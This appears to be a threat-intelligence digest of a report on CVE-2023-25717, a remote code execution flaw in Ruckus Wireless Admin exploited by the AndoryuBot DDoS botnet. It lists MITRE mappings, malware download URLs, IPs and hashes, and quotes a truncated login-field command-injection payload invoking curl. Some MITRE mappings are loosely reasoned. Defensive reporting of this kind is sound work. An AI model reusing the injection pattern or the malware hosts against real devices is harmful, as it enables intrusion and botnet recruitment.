A critical RCE vulnerability in Ruckus Wireless Admin (CVE-2023-25717) is being actively exploited, with AndoryuBot deployed to weaponize the flaw for large-scale DDoS campaigns. Cyble CGSI and Fortinet report widespread exposure of Ruckus Admin panels and a growing threat ecosystem around AndoryuBot, which is sold on Telegram on a subscription basis. #CVE-2023-25717 #AndoryuBot #RuckusVulnerability
Keypoints
- CVE-2023-25717 is a critical Remote Code Execution vulnerability in Ruckus Wireless Admin that can be triggered via specially crafted HTTP requests.
- Active exploitation has been observed, with AndoryuBot deployed by threat actors targeting vulnerable Ruckus assets.
- Public PoC availability and Fortinet/CISA alerts indicate increasing opportunistic use and known exploitation in the wild.
- Approximately 52,000 Ruckus Wireless Admin panels are exposed on the internet, with geographic distribution analyzed by researchers.
- AndoryuBot is a subscription-based botnet malware sold on Telegram used to orchestrate large-scale DDoS attacks.
- IoCs include malicious URLs, IP addresses, and binary hashes associated with the AndoryuBot variant.
MITRE Techniques
- [T1059] Command and Scripting Interpreter β Used in the login attempt payload that includes a curl invocation: ββ/forms/doLogin?login_username=admin&password=password$(curl substring)’β
- [T1095] Non-Application Layer Protocol β Utilized to support or enable DDoS activity by flooding targets with traffic, i.e., βorchestrate large-scale DDoS attacks, which can overwhelm targeted servers and infrastructure by flooding them with a massive volume of traffic.β
- [T1140] Deobfuscate/Decode Files or Information β Part of defense evasion/processing as part of handling payloads during deployment, per the MITRE mapping in the article.
- [T1480] Execution Guardrails β Involves safeguards or constraints associated with executing payloads as described in the ATT&CK mapping.
- [T1036] Masquerading β Implicitly reflected in the exposure and apparent legitimacy of admin interfaces (exposed Ruckus Admin Panel) used for access.
- [T1055] Process Injection β Conceptually tied to executing injected processes when deploying botnet payloads and commands.
Indicators of Compromise
- [URL] Malicious URL β hxxp://47.87.154.192/Andoryu.m68k, hxxp://47.87.154.192/Andoryu.arm7
- [IP] Malicious IP β 47.87.154.192, 163.123.142.146
- [Hash] MD5/SHA1/SHA256 β d2ad2d8d1b7dac89f2fb977c6b2c36a9, 86d630159a13b4a594e3eae23ccbda891a67f696, c4925a91ed853920d8acee79bf0bb9342da4dabc0a2970823027f39ede399bce
Read more: https://blog.cyble.com/2023/05/17/andoryubots-ddos-rampage/